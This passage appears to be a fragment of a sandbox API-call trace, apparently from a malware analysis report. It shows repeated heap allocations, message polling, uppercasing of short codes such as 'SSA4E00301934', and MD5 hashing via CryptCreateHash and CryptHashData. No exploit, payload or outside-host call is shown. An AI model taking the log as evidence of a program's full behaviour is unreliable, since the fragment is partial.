(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.337] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0262.337] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.338] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0262.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.338] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.339] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.339] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.339] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.339] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.339] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.339] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.339] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.340] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.340] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.340] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.340] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.340] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.340] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.340] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.341] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.341] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.341] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.341] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.341] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0262.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0262.342] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.342] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.342] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.342] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.342] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.343] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.343] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.343] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.343] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.343] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.344] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0262.344] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0262.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.345] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.345] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.345] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.346] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0262.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0262.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.347] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.347] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.347] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.347] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.347] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.348] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.348] CryptHashData (hHash=0xaa5920, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0262.348] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0262.349] RtlAllocateHeap (HeapHandle=0x25c0000, 